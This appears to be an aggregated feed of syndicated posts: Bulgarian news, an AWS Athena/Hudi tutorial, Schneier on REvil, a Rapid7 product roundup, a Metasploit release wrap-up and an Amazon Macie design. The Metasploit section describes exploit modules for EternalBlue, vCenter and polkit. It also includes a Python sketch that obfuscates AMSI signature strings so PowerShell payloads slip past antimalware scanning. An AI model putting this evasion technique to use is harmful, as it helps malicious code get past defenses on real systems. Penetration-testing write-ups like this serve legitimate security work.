Bulgaria's leaders are the only ones in the EU who have not announced whether they are vaccinated against COVID-19

Post Syndicated from Иван Радев original https://toest.bg/bg-leaders-vaccine-covid-19/

Over six months, from December 2020 to June 2021, the leaders of all European Union countries announced that they had been vaccinated against COVID-19. All countries but one: Bulgaria. Unlike his European counterparts, President Rumen Radev has not yet decided to take this step. At least not publicly. The same goes for former Prime Minister Boyko Borissov, as well as for caretaker Prime Minister Stefan…

Source

How we learn media literacy

Post Syndicated from Йоанна Елми original https://toest.bg/kak-se-uchim-na-mediyna-gramotnost/

"The 21st-Century School" is a joint column of Toest and Zaedno v chas in which we present successful practices in Bulgarian education and look for workable ways to improve it. One of students' biggest problems is that they cannot tell fact from opinion, says Sava Tashev, a teacher at the 97th Secondary School "Bratya Miladinovi" in Sofia. He teaches media literacy "through the subject…

Source

We are screaming to the world that we need help

Post Syndicated from original https://toest.bg/kreshtim-na-sveta-che-imame-nuzhda-ot-pomosht/

Tuesday, 13 July 2021. – Hi! I'm writing to you over a secret WiFi network. – Why secret? – They cut off our internet. No one has a mobile data connection, because they don't want what is happening right now to get out. This is my cry from the streets of Havana today. – Is that you in the audio? – Yes. We can't take it any longer. They are starving us to death. I can't go on like this.

Source

On Second Reading: „Празнината“ by Катерина Върмет

Post Syndicated from Стефан Иванов original https://toest.bg/na-vtoro-chetene-prazninata/

None of us reads only the newest books. So why are they the only ones written about? "On Second Reading" is a column in which we open up the lists of books published at least a year ago, read them, and recommend our favorites. The column is part of the Toest Readers' Club partner program. The choice of titles, however, is entirely up to the authors, Stefan Ivanov and Sevda Semer, who would recommend to you…

Source

The Week in Toest (12–16 July)

Post Syndicated from Тоест original https://toest.bg/editorial-12-16-july-2021/

The second parliamentary elections of 2021 are now history, too. Given the events of the week, the possibility that we will have to vote for parliament again before the end of the year cannot be ruled out entirely. "There Is Such a People" evidently does not realize that, although it formally won the elections, its victory is Pyrrhic and it cannot afford the comfort of setting the course single-handedly. Or they simply do not want to…

Source

Query an Apache Hudi dataset in an Amazon S3 data lake with Amazon Athena part 1: Read-optimized queries

Post Syndicated from Dhiraj Thakur original https://aws.amazon.com/blogs/big-data/part-1-query-an-apache-hudi-dataset-in-an-amazon-s3-data-lake-with-amazon-athena-part-1-read-optimized-queries/

On July 16, 2021, Amazon Athena upgraded its Apache Hudi integration with new features and support for Hudi's latest 0.8.0 release. Hudi is an open-source storage management framework that provides incremental data processing primitives for Hadoop-compatible data lakes. This upgraded integration adds the latest community improvements to Hudi along with important new features, including snapshot queries, which provide near-real-time views of table data, and reading bootstrapped tables, which provides efficient migration of existing table data.

In this series of posts on Athena and Hudi, we will provide a short overview of key Hudi capabilities along with detailed procedures for using read-optimized queries, snapshot queries, and bootstrapped tables.

Overview

With Apache Hudi, you can perform record-level inserts, updates, and deletes on Amazon S3, allowing you to comply with data privacy laws, consume real-time streams and change data captures, reinstate late-arriving data, and track history and rollbacks in an open, vendor neutral format. Apache Hudi uses Apache Parquet and Apache Avro storage formats for data storage, and includes built-in integrations with Apache Spark, Apache Hive, and Apache Presto, which enables you to query Apache Hudi datasets using the same tools that you use today with near-real-time access to fresh data.

An Apache Hudi dataset can be one of the following table types:

  • Copy on Write (CoW) – Data is stored in columnar format (Parquet), and each update creates a new version of the base file on a write commit. A CoW table type typically lends itself to read-heavy workloads on data that changes less frequently.
  • Merge on Read (MoR) – Data is stored using a combination of columnar (Parquet) and row-based (Avro) formats. Updates are logged to row-based delta files and are compacted as needed to create new versions of the columnar files. A MoR table type is typically suited for write-heavy or change-heavy workloads with fewer reads.

Apache Hudi provides three logical views for accessing data:

  • Read-optimized – Provides the latest committed dataset from CoW tables and the latest compacted dataset from MoR tables
  • Incremental – Provides a change stream between two actions out of a CoW dataset to feed downstream jobs and extract, transform, load (ETL) workflows
  • Real-time – Provides the latest committed data from a MoR table by merging the columnar and row-based files inline

As of this writing, Athena supports read-optimized and real-time views.

Using read-optimized queries

In this post, you will use Athena to query an Apache Hudi read-optimized view on data residing in Amazon S3. The walkthrough includes the following high-level steps:

  1. Store raw data in an S3 data lake.
  2. Transform the raw data to Apache Hudi CoW and MoR tables using Apache Spark on Amazon EMR.
  3. Query and analyze the tables on Amazon S3 with Athena on a read-optimized view.
  4. Perform an update to a row in the Apache Hudi dataset.
  5. Query and analyze the updated dataset using Athena.

Architecture

The following diagram illustrates our solution architecture.

In this architecture, you have high-velocity weather data stored in an S3 data lake. This raw dataset is processed on Amazon EMR and stored in an Apache Hudi dataset in Amazon S3 for further analysis by Athena. If the data is updated, Apache Hudi performs an update on the existing record, and these updates are reflected in the results fetched by the Athena query.

Let’s build this architecture.

Prerequisites

Before getting started, we set up our resources. For this post, we use the us-east-1 Region.

  1. Create an Amazon Elastic Compute Cloud (Amazon EC2) key pair. For instructions, see Create a key pair using Amazon EC2.
  2. Create an S3 bucket for storing the raw weather data (for this post, we call it weather-raw-bucket).
  3. Create two folders in the S3 bucket: parquet_file and delta_parquet.
  4. Download all the data files, Apache Scala scripts (data_insertion_cow_delta_script, data_insertion_cow_script, data_insertion_mor_delta_script, and data_insertion_mor_script), and Athena DDL code (athena_weather_hudi_cow.sql and athena_weather_hudi_mor.sql) from the GitHub repo.
  5. Upload the weather_oct_2020.parquet file to weather-raw-bucket/parquet_file.
  6. Upload the file weather_delta.parquet to weather-raw-bucket/delta_parquet. We update an existing weather record from a relative_humidity of 81 to 50 and a temperature of 6.4 to 10.
  7. Create another S3 bucket for storing the Apache Hudi dataset. For this post, we create a bucket with a corresponding subfolder named athena-hudi-bucket/hudi_weather.
  8. Deploy the EMR cluster using the provided AWS CloudFormation template:
  9. Enter a name for your stack.
  10. Choose a pre-created key pair name.

This is required to connect to the EMR cluster nodes. For more information, see Connect to the Master Node Using SSH.

  1. Accept all the defaults and choose Next.
  2. Acknowledge that AWS CloudFormation might create AWS Identity and Access Management (IAM) resources.
  3. Choose Create stack.

Use Apache Hudi with Amazon EMR

When the cluster is ready, you can use the provided key pair to SSH into the primary node.

  1. Use the following bash command to load the spark-shell to work with Apache Hudi:
    spark-shell --conf "spark.serializer=org.apache.spark.serializer.KryoSerializer" --conf "spark.sql.hive.convertMetastoreParquet=false" --jars /usr/lib/hudi/hudi-spark-bundle.jar,/usr/lib/spark/external/lib/spark-avro.jar

  2. On the spark-shell, run the following Scala code in the script data_insertion_cow_script to import weather data from the S3 data lake to an Apache Hudi dataset using the CoW storage type:
    import org.apache.spark.sql.SaveMode
    import org.apache.spark.sql.functions._
    import org.apache.hudi.DataSourceWriteOptions
    import org.apache.hudi.config.HoodieWriteConfig
    import org.apache.hudi.hive.MultiPartKeysValueExtractor
    
    //Set up various input values as variables
    val inputDataPath = "s3://weather-raw-bucket/parquet_file/"
    val hudiTableName = "weather_hudi_cow"
    val hudiTablePath = "s3://athena-hudi-bucket/hudi_weather/" + hudiTableName
    
    // Set up our Hudi Data Source Options
    val hudiOptions = Map[String,String](
        DataSourceWriteOptions.RECORDKEY_FIELD_OPT_KEY -> "city_id",
        // Scala Map keys are unique, so this second RECORDKEY entry ("timestamp")
        // overrides "city_id" and becomes the effective record key.
        DataSourceWriteOptions.RECORDKEY_FIELD_OPT_KEY -> "timestamp",
        DataSourceWriteOptions.PARTITIONPATH_FIELD_OPT_KEY -> "date", 
        HoodieWriteConfig.TABLE_NAME -> hudiTableName, 
        DataSourceWriteOptions.OPERATION_OPT_KEY ->
            DataSourceWriteOptions.INSERT_OPERATION_OPT_VAL, 
        DataSourceWriteOptions.PRECOMBINE_FIELD_OPT_KEY -> "timestamp", 
        DataSourceWriteOptions.HIVE_SYNC_ENABLED_OPT_KEY -> "true", 
        DataSourceWriteOptions.HIVE_TABLE_OPT_KEY -> hudiTableName, 
        DataSourceWriteOptions.HIVE_PARTITION_FIELDS_OPT_KEY -> "date", 
        DataSourceWriteOptions.HIVE_PARTITION_EXTRACTOR_CLASS_OPT_KEY ->
            classOf[MultiPartKeysValueExtractor].getName)
    
    // Read data from S3 and create a DataFrame with Partition and Record Key
    val inputDF = spark.read.format("parquet").load(inputDataPath)
    
    // Write data into the Hudi dataset
    inputDF.write.format("org.apache.hudi").options(hudiOptions).mode(SaveMode.Append).save(hudiTablePath)

Replace the S3 bucket path for inputDataPath and hudiTablePath in the preceding code with your S3 bucket.

For more information about DataSourceWriteOptions, see Work with a Hudi Dataset.

  1. In the spark-shell, count the total number of records in the Apache Hudi dataset:
    scala> inputDF.count()
    res1: Long = 1000

  2. Repeat the same steps to create an MoR table using data_insertion_mor_script (COPY_ON_WRITE is the default storage type, so the MoR script specifies the MERGE_ON_READ table type explicitly).
  3. Run spark.sql("show tables").show() to list three tables: one for the CoW dataset and two for the MoR dataset, suffixed _rt (real-time) and _ro (read-optimized).

The following screenshot shows our output.

Let’s check the processed Apache Hudi dataset in the S3 data lake.

  1. On the Amazon S3 console, confirm the subfolders weather_hudi_cow and weather_hudi_mor are in athena-hudi-bucket.
  2. Navigate to the weather_hudi_cow subfolder to see the Apache Hudi dataset partitioned by the date key, with one folder for each date in our dataset.
  3. On the Athena console, create a hudi_athena_test database using the following command:
    create database hudi_athena_test;

You use this database to create all your tables.

  1. Create an Athena table using the athena_weather_hudi_cow.sql script:
    CREATE EXTERNAL TABLE weather_partition_cow(
      `_hoodie_commit_time` string,
      `_hoodie_commit_seqno` string,
      `_hoodie_record_key` string,
      `_hoodie_partition_path` string,
      `_hoodie_file_name` string,
      `city_id` string,
      `timestamp` string,
      `relative_humidity` decimal(3,1),
      `temperature` decimal(3,1),
      `absolute_humidity` decimal(5,4)
      )
      PARTITIONED BY ( 
      `date` string)
    ROW FORMAT SERDE
      'org.apache.hadoop.hive.ql.io.parquet.serde.ParquetHiveSerDe'
    STORED AS INPUTFORMAT
      'org.apache.hudi.hadoop.HoodieParquetInputFormat'
    OUTPUTFORMAT
      'org.apache.hadoop.hive.ql.io.parquet.MapredParquetOutputFormat'
    LOCATION
      's3://athena-hudi-bucket/hudi_weather/weather_hudi_cow'
    

Replace the S3 bucket path in the preceding code with your S3 bucket (Hudi table path) in LOCATION.

  1. Add partitions to the table by running the following query from the athena_weather_hudi_cow.sql script on the Athena console:
    ALTER TABLE weather_partition_cow ADD
    PARTITION (date = '2020-10-01') LOCATION 's3://athena-hudi-bucket/hudi_weather/weather_hudi_cow/2020-10-01/'
    PARTITION (date = '2020-10-02') LOCATION 's3://athena-hudi-bucket/hudi_weather/weather_hudi_cow/2020-10-02/'
    PARTITION (date = '2020-10-03') LOCATION 's3://athena-hudi-bucket/hudi_weather/weather_hudi_cow/2020-10-03/'
    PARTITION (date = '2020-10-04') LOCATION 's3://athena-hudi-bucket/hudi_weather/weather_hudi_cow/2020-10-04/';

Replace the S3 bucket path in the preceding code with your S3 bucket (Hudi table path) in LOCATION.

  1. Confirm the total number of records in the Apache Hudi dataset with the following query:
    SELECT count(*) FROM "hudi_athena_test"."weather_partition_cow";

It should return a single row with a count of 1,000.
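
If you prefer to run these Athena checks programmatically rather than from the console, the following is a minimal boto3 sketch (the results OutputLocation is an assumption; point it at any S3 prefix you can write to):

    import time
    import boto3

    # Assumed results prefix; replace with a location of your own.
    ATHENA_OUTPUT = "s3://athena-hudi-bucket/athena-results/"

    athena = boto3.client("athena", region_name="us-east-1")

    def run_query(sql, database="hudi_athena_test"):
        """Start an Athena query, wait for it to finish, and return the result rows."""
        execution = athena.start_query_execution(
            QueryString=sql,
            QueryExecutionContext={"Database": database},
            ResultConfiguration={"OutputLocation": ATHENA_OUTPUT},
        )
        query_id = execution["QueryExecutionId"]

        # Poll until the query reaches a terminal state
        while True:
            state = athena.get_query_execution(QueryExecutionId=query_id)[
                "QueryExecution"]["Status"]["State"]
            if state in ("SUCCEEDED", "FAILED", "CANCELLED"):
                break
            time.sleep(1)

        if state != "SUCCEEDED":
            raise RuntimeError(f"Query {query_id} ended in state {state}")
        return athena.get_query_results(QueryExecutionId=query_id)["ResultSet"]["Rows"]

    rows = run_query('SELECT count(*) FROM "hudi_athena_test"."weather_partition_cow"')
    print(rows[1])  # rows[0] is the header row; rows[1] holds the count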

Now let’s check the record that we want to update.

  1. Run the following query on the Athena console:
    SELECT * FROM "hudi_athena_test"."weather_partition_cow"
    where city_id ='1'
    and date ='2020-10-04'
    and timestamp = '2020-10-04T07:19:12Z';

The output should look like the following screenshot. Note the value of relative_humidity and temperature.

  1. Return to the Amazon EMR primary node and run the following code in the data_insertion_cow_delta_script script on the spark-shell prompt to update the data:
    import org.apache.spark.sql.SaveMode
    import org.apache.spark.sql.functions._
    import org.apache.hudi.DataSourceWriteOptions
    import org.apache.hudi.config.HoodieWriteConfig
    import org.apache.hudi.hive.MultiPartKeysValueExtractor
    
    //Set up various input values as variables
    val inputDataPath = "s3://weather-raw-bucket/delta_parquet/"
    val hudiTableName = "weather_hudi_cow"
    val hudiTablePath = "s3://athena-hudi-bucket/hudi_weather/" + hudiTableName
    
    // Set up our Hudi Data Source Options
    val hudiOptions = Map[String,String](
        DataSourceWriteOptions.RECORDKEY_FIELD_OPT_KEY -> "city_id",
        // Scala Map keys are unique, so this second RECORDKEY entry ("timestamp")
        // overrides "city_id" and becomes the effective record key.
        DataSourceWriteOptions.RECORDKEY_FIELD_OPT_KEY -> "timestamp",
        DataSourceWriteOptions.PARTITIONPATH_FIELD_OPT_KEY -> "date", 
        HoodieWriteConfig.TABLE_NAME -> hudiTableName, 
        DataSourceWriteOptions.OPERATION_OPT_KEY ->
            DataSourceWriteOptions.INSERT_OPERATION_OPT_VAL, 
        DataSourceWriteOptions.PRECOMBINE_FIELD_OPT_KEY -> "timestamp", 
        DataSourceWriteOptions.HIVE_SYNC_ENABLED_OPT_KEY -> "true", 
        DataSourceWriteOptions.HIVE_TABLE_OPT_KEY -> hudiTableName, 
        DataSourceWriteOptions.HIVE_PARTITION_FIELDS_OPT_KEY -> "date", 
        DataSourceWriteOptions.HIVE_PARTITION_EXTRACTOR_CLASS_OPT_KEY ->
            classOf[MultiPartKeysValueExtractor].getName)
    
    // Read data from S3 and create a DataFrame with Partition and Record Key
    val inputDF = spark.read.format("parquet").load(inputDataPath)
    
    // Write data into the Hudi dataset
    inputDF.write.format("org.apache.hudi").options(hudiOptions).mode(SaveMode.Append).save(hudiTablePath)
    

Replace the S3 bucket path for inputDataPath and hudiTablePath in the preceding code with your S3 bucket.

  1. Run the following query on the Athena console to confirm no change occurred to the total number of records:
    SELECT count(*) FROM "hudi_athena_test"."weather_partition_cow";

The following screenshot shows our query results.

  1. Run the following query again on the Athena console to check for the update:
    SELECT * FROM "hudi_athena_test"."weather_partition_cow"
    where city_id ='1'
    and date ='2020-10-04'
    and timestamp = '2020-10-04T07:19:12Z';

The relative_humidity and temperature values for the relevant record are updated.

  1. Repeat similar steps for the MoR table.

Clean up the resources

You must clean up the resources you created earlier to avoid ongoing charges.

  1. On the AWS CloudFormation console, delete the stack you launched.
  2. On the Amazon S3 console, empty the buckets weather-raw-bucket and athena-hudi-bucket and delete the buckets.

Conclusion

In this post, we used Apache Hudi support in Amazon EMR to build a data pipeline that simplifies incremental data management use cases requiring record-level insert and update operations. We then used Athena to read the read-optimized view of an Apache Hudi dataset in an S3 data lake.


About the Authors

Dhiraj Thakur is a Solutions Architect with Amazon Web Services. He works with AWS customers and partners to provide guidance on enterprise cloud adoption, migration, and strategy. He is passionate about technology and enjoys building and experimenting in the analytics and AI/ML space.

Sameer Goel is a Solutions Architect in the Netherlands, who drives customer success by building prototypes on cutting-edge initiatives. Prior to joining AWS, Sameer graduated with a master’s degree from NEU Boston, with a Data Science concentration. He enjoys building and experimenting with creative projects and applications.

Imtiaz (Taz) Sayed is the WW Tech Master for Analytics at AWS. He enjoys engaging with the community on all things data and analytics.

REvil is Off-Line

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/07/revil-is-off-line.html

This is an interesting development:

Just days after President Biden demanded that President Vladimir V. Putin of Russia shut down ransomware groups attacking American targets, the most aggressive of the groups suddenly went off-line early Tuesday.

[…]

Gone was the publicly available “happy blog” the group maintained, listing some of its victims and the group’s earnings from its digital extortion schemes. Internet security groups said the custom-made sites — think of them as virtual conference rooms — where victims negotiated with REvil over how much ransom they would pay to get their data unlocked also disappeared. So did the infrastructure for making payments.

Okay. So either the US took them down, Russia took them down, or they took themselves down.

What’s New in InsightVM: Q2 2021 in Review

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/07/16/insightvm-release-roundup-q2-2021/


The world is changing rapidly. We hear that phrase a lot. Throughout Q2, though, it really was true. Vaccines have been rolling out, with varying success depending on the part of the world, but there is optimism.

As Rapid7 offices begin to open up to our hard-working team members around the globe, we want to infuse some of that optimism into the latest and greatest new features and updates now available to InsightVM customers. The back half of the year will no doubt bring new threats (will ransomware attacks keep getting bigger?), so let’s dive into what’s new so you can prepare and prosper.

Honorable mention

In our Q1 recap, we covered two releases that can each have a significant positive impact on your operations, so they bear repeating here.

Kubernetes integration

You can now navigate directly to the new Kubernetes tab in InsightVM to initiate the Kubernetes monitor in DockerHub. Then, deploy it to your clusters to see data in Container VRM within InsightVM. You can also see monitor health and connection details via the Data Collection Management page.

Scoped Executive Summary Report

The Executive Summary Report in InsightVM has expanded its functionality so users can filter the report for at-a-glance views of priority items. Shape the report to access key metrics and communicate progress to desired goals and outcomes.

Dashboards, consoles, and panels, oh my!

The new releases and updates for the second quarter of 2021 were aimed at quick-look features that bolster our goal of providing customers with evolving ease-of-use functionalities and products that increasingly focus on at-a-glance convenience.

What’s new: Dialing up dashboard performance

Featuring new cards as well as new ways to filter them, these releases address three distinct needs:

Gaining insights into Microsoft’s vulnerability patch cycle

Rapid7’s Patch Tuesday dashboard template now provides an easy way to stay up to date on information associated with deployment of new Microsoft patches and cycles. Why search around for news or insights when you can get them in the one-stop-shop where your team already receives updates and kicks off remediation efforts on the latest vulnerabilities?

Featuring new cards detailing the assets affected as well as trends, assessments, and biggest risks, you can now learn about and prioritize remediation efforts on all Microsoft vulnerabilities within this expanded InsightVM dashboard.  

Hunting down fine-grained vulnerability-and-remediation details

  • New card #1: New vs remediated vulnerability comparison over time
    • Displays trends in remediated vulnerability findings for date ranges you specify.
  • New card #2: Average days to remediate by severity
    • Compares the average number of days needed to remediate a specific vulnerability against all vulnerabilities remediated for a week you specify.
  • New card #3: Number of unique vulnerabilities
    • Expandable table shows the number of all unique vulnerabilities in the Rapid7 database for which InsightVM has checks as well as the number of all unique vulnerabilities in the user’s environment.
  • New card #4: Asset type
    • Bar chart displays device type for assets in the scope you filter. Each bar shows the number of assets for a given os.type, sorted from left to right.

Filtering every card in a dashboard to focus the view on a group of assets or issues

If this were about finding the best way to get past a big city, we would say this new feature is the loop that takes you around the traffic, versus the surface streets that often put you right in it.

You can now quickly filter all of your cards by applying a single query to your dashboard. Gone are the days of manually filtering each and every card just to focus your view on a group of assets or vulnerabilities. Long story short: You save more time by quickly filtering to your desired view.  

What’s improved: Shortcuts to what you need

To continue the traffic analogy, getting somewhere faster than you’re used to is always a great thing. The latest InsightVM improvements help you do just that by addressing 3 issues:

Manually loading custom vulnerability checks

Now you can simply load a custom check into the Security Console and let the console do the rest: start the scan, and the console automatically pushes the check to whichever Scan Engine(s) you specify.

More context needed

Peek. Panel. Proof. What that actually means is InsightVM now offers at-a-glance context about a specific vulnerability via a “peek panel.” When a user clicks on an affected asset from the vulnerability details page, the panel opens to the right and displays the proof details.  

Gaining results visibility

Teams assessing container image builds in their CI/CD pipeline can now see results in the InsightVM Container Security feature Builds tab.

We hope you have a successful quarter and a great season, wherever your business takes you. Until next time…    


Metasploit Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/07/16/metasploit-wrap-up-121/

Eternal Blue improvements


Prior to this release, Metasploit offered two separate exploit modules for targeting MS17-010, dubbed Eternal Blue. The Ruby module previously supported only Windows 7, and a separate ms17_010_eternalblue_win8 Python module would target Windows 8 and above.

Now Metasploit provides a single Ruby exploit module, exploits/windows/smb/ms17_010_eternalblue.rb, which can target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change removes the need for users to have Python and impacket installed on their host machine, and the automatic targeting functionality also makes the module easier to run against targets.

AmSi 0BfuSc@t!on

The Antimalware Scan Interface (AMSI) integrated into Windows poses a lot of challenges for offensive security testing. While bypasses exist, and one such technique is integrated directly into Metasploit, the bypass stub itself is identified as malicious. This creates a chicken-and-egg problem: the stub cannot execute to bypass AMSI, so the payload never gets to run. To address this, Metasploit now randomizes the AMSI bypass stub itself. The randomization both obfuscates literal string values that are known AMSI signatures, such as amsiInitFailed, and shuffles the placement of PowerShell expressions. With these improvements in place, PowerShell payloads are now much more likely to execute successfully. While the bypass stub is now prepended by default for all exploit modules, it can be explicitly disabled by setting Powershell::prepend_protections_bypass to false.
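
Metasploit's actual implementation lives in the framework's Ruby code; purely as a conceptual illustration of the literal-randomization idea (not Metasploit's code), the following Python sketch splits known flagged string literals into randomized concatenations that evaluate to the same value in PowerShell:

    import random

    # Illustrative list of literals commonly matched by static AMSI signatures
    FLAGGED_LITERALS = ["amsiInitFailed", "AmsiUtils"]

    def split_literal(value):
        """Break a literal into random chunks and rebuild it with PowerShell
        string concatenation, e.g. 'amsiInitFailed' -> ('amsi'+'InitFa'+'iled')."""
        cuts = sorted(random.sample(range(1, len(value)), k=random.randint(1, 3)))
        chunks = [value[i:j] for i, j in zip([0] + cuts, cuts + [len(value)])]
        return "(" + "+".join("'" + c + "'" for c in chunks) + ")"

    def obfuscate_stub(stub):
        """Replace quoted flagged literals in a PowerShell stub with randomized
        concatenations so a fixed signature no longer matches the stub text."""
        for literal in FLAGGED_LITERALS:
            stub = stub.replace("'" + literal + "'", split_literal(literal))
        return stub

    print(obfuscate_stub(".GetField('amsiInitFailed','NonPublic,Static')"))

Each run produces a differently chunked stub, which is the property that defeats static signature matching.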

VMware vCenter Server RCE

Our very own Will Vu has added a new exploit module targeting VMware vCenter Server CVE-2021-21985. This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin’s ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. This module has been tested against VMware vCenter Server 6.7 Update 3m (Linux appliance). For testing in your own lab environment, full details are in the module documentation.

New module content (4)

  • VMware vCenter Server Virtual SAN Health Check Plugin RCE by wvu and Ricter Z, which exploits CVE-2021-21985 – A new exploit module for VMware vCenter Server CVE-2021-21985 which exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin’s ProxygenController class to execute code as the vsphere-ui user.
  • Polkit D-Bus Authentication Bypass by Kevin Backhouse, Spencer McIntyre, and jheysel-r7, which exploits CVE-2021-3560 – A new module has been added which exploits CVE-2021-3560, an authentication bypass and local privilege elevation vulnerability in polkit, a toolkit for defining and handling authorizations which is installed by default on many Linux systems. Successful exploitation results in the creation of a new user with root permissions, which can then be used to gain a shell as root. Note that on some systems exploitation requires a non-interactive session, so users may need to gain an SSH session first before exploiting this vulnerability.
  • ForgeRock / OpenAM Jato Java Deserialization by Michael Stepankin, Spencer McIntyre, bwatters-r7, and jheysel-r7, which exploits CVE-2021-35464 – A new module has been added which exploits CVE-2021-35464, a pre-authentication Java deserialization vulnerability in OpenAM and ForgeRock AM. Successful exploitation allows for remote code execution as the user running the OpenAM service.
  • Windows Process Memory Dump by smashery – This adds a new post module that dumps the memory of any process on the target. This module is able to perform a full or a standard dump. It also downloads the file into the local loot database and deletes the temporary file on the target.

Enhancements and features

  • #15217 from agalway-r7 – Removes the Python module ms17_010_eternalblue_win8.py and consolidates the functionality into exploits/windows/smb/ms17_010_eternalblue.rb, which as a result can now target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change removes the need to have Python installed on the host machine, and the automatic targeting functionality makes this module easier to run.
  • #15254 from zeroSteiner – This updates the AMSI bypass used by modules executing Powershell code to be randomized, making it more difficult to detect using static signatures.

Bugs fixed

  • #15362 from bwatters-r7 – Fixes a regression issue with post/multi/manage/shell_to_meterpreter, and other interactions with command shell based sessions
  • #15420 from adfoster-r7 – Fixes a regression issue where auxiliary/scanner/ssh/eaton_xpert_backdoor failed to load correctly

Get it

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post on GitHub.

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Using Amazon Macie to Validate S3 Bucket Data Classification

Post Syndicated from Bill Magee original https://aws.amazon.com/blogs/architecture/using-amazon-macie-to-validate-s3-bucket-data-classification/

Securing sensitive information is a high priority for organizations for many reasons. At the same time, organizations are looking for ways to empower development teams to stay agile and innovative. Centralized security teams strive to create systems that align to the needs of the development teams, rather than mandating how those teams must operate.

Security teams who create automation for the discovery of sensitive data have some issues to consider. If development teams are able to self-provision data storage, how does the security team protect that data? If teams have a business need to store sensitive data, they must consider how, where, and with what safeguards that data is stored.

Let’s look at how we can set up Amazon Macie to validate data classifications provided by decentralized software development teams. Macie is a fully managed service that uses machine learning (ML) to discover sensitive data in AWS. If you are not familiar with Macie, read New – Enhanced Amazon Macie Now Available with Substantially Reduced Pricing.

Data classification is part of the security pillar of a Well-Architected application. Following the guidelines provided in the AWS Well-Architected Framework, we can develop a resource-tagging scheme that fits our needs.

Overview of decentralized data validation system

In our example, we have multiple levels of data classification that represent different levels of risk associated with each classification. When a software development team creates a new Amazon Simple Storage Service (S3) bucket, they are responsible for labeling that bucket with a tag. This tag represents the classification of data stored in that bucket. The security team must maintain a system to validate that the data in those buckets meets the classification specified by the development teams.

This separation of roles and responsibilities for development and security teams who work independently requires a validation system that’s decoupled from S3 bucket creation. It should automatically detect new buckets or data in the existing buckets, and validate the data against the assigned classification tags. It should also notify the appropriate development teams of misclassified or unclassified buckets in a timely manner. These notifications can be through standard notification channels, such as email or Slack channel notifications.

Validation and alerts with AWS services

Figure 1. Validation system for data classification

We assume that teams are permitted to create S3 buckets and we will use AWS Config to enforce the following required tags: DataClassification and SupportSNSTopic. The DataClassification tag indicates what type of data is allowed in the bucket. The SupportSNSTopic tag indicates an Amazon Simple Notification Service (SNS) topic. If there are issues found with the data in the bucket, a message is published to the topic, and Amazon SNS will deliver an alert. For example, if there is personally identifiable information (PII) data in a bucket that is classified as non-sensitive, the system will alert the owners of the bucket.
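
The post does not show how the tag requirement is enforced; one hedged way to do it is the AWS Config managed rule REQUIRED_TAGS scoped to S3 buckets, as in the boto3 sketch below (the rule name is hypothetical; the REQUIRED_TAGS identifier and its tagNKey parameters belong to AWS Config's managed rule set):

    import boto3

    config = boto3.client("config", region_name="us-east-1")

    # Flag any S3 bucket missing the two required classification tags
    config.put_config_rule(
        ConfigRule={
            "ConfigRuleName": "s3-bucket-classification-tags",  # hypothetical name
            "Description": "Require DataClassification and SupportSNSTopic tags on S3 buckets",
            "Scope": {"ComplianceResourceTypes": ["AWS::S3::Bucket"]},
            "Source": {"Owner": "AWS", "SourceIdentifier": "REQUIRED_TAGS"},
            "InputParameters": '{"tag1Key": "DataClassification", "tag2Key": "SupportSNSTopic"}',
        }
    )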

Macie is configured to scan all S3 buckets on a scheduled basis. This configuration ensures that any new bucket and data placed in the buckets is analyzed the next time the Macie job runs.

Macie provides several managed data identifiers for discovering and classifying the data. These include bank account numbers, credit card information, authentication credentials, PII, and more. You can also create custom identifiers (or rules) to gather information not covered by the managed identifiers.

Macie integrates with Amazon EventBridge to allow us to capture data classification events and route them to one or more destinations for reporting and alerting needs. In our configuration, the event invokes an AWS Lambda function. The Lambda function validates the data classification inferred by Macie against the classification specified in the DataClassification tag, using custom business logic. If a data classification violation is found, the Lambda function then sends a message to the Amazon SNS topic specified in the SupportSNSTopic tag.

The Lambda function also creates custom metrics and sends those to Amazon CloudWatch. The metrics are organized by engineering team and severity. This allows the security team to create a dashboard of metrics based on the Macie findings. The findings can also be filtered per engineering team and severity to determine which teams need to be contacted to ensure remediation.
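
The post does not include the Lambda function's code, so here is a minimal Python sketch of what the validation logic might look like. The Macie finding fields under event['detail'], the Team tag, and the ALLOWED mapping are assumptions for illustration; adapt them to your own finding types, tagging scheme, and business logic:

    import json
    import boto3

    s3 = boto3.client("s3")
    sns = boto3.client("sns")
    cloudwatch = boto3.client("cloudwatch")

    # Hypothetical mapping: which Macie finding types are acceptable per classification
    ALLOWED = {
        "NonSensitive": set(),
        "Sensitive": {"SensitiveData:S3Object/Personal"},
    }

    def handler(event, context):
        detail = event["detail"]
        bucket = detail["resourcesAffected"]["s3Bucket"]["name"]
        finding_type = detail["type"]
        severity = detail["severity"]["description"]

        # Read the bucket's classification and support topic from its tags
        tags = {t["Key"]: t["Value"]
                for t in s3.get_bucket_tagging(Bucket=bucket)["TagSet"]}
        classification = tags.get("DataClassification", "Unclassified")
        topic_arn = tags.get("SupportSNSTopic")

        if finding_type in ALLOWED.get(classification, set()):
            return  # data conforms to the declared classification

        if topic_arn:
            sns.publish(
                TopicArn=topic_arn,
                Subject="Data classification violation in " + bucket,
                Message=json.dumps({"bucket": bucket, "finding": finding_type,
                                    "classification": classification}),
            )

        # Custom metric, dimensioned by team and severity, for the security dashboard
        cloudwatch.put_metric_data(
            Namespace="DataClassification",
            MetricData=[{
                "MetricName": "Violations",
                "Dimensions": [
                    {"Name": "Team", "Value": tags.get("Team", "unknown")},  # hypothetical tag
                    {"Name": "Severity", "Value": severity},
                ],
                "Value": 1,
            }],
        )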

Conclusion

This solution provides a centralized security team with the tools it needs. The team can validate the data classification of an Amazon S3 bucket that is self-provisioned by a development team. New Amazon S3 buckets are automatically included in the Macie jobs, and alerts are sent only if the data in a bucket does not conform to the classification specified by the development team. The data auditing process is loosely coupled with the Amazon S3 bucket creation process, enabling self-service capabilities for development teams while ensuring proper data classification. Your teams can stay agile and innovative, while maintaining a strong security posture.

Learn more about Amazon Macie and Data Classification.

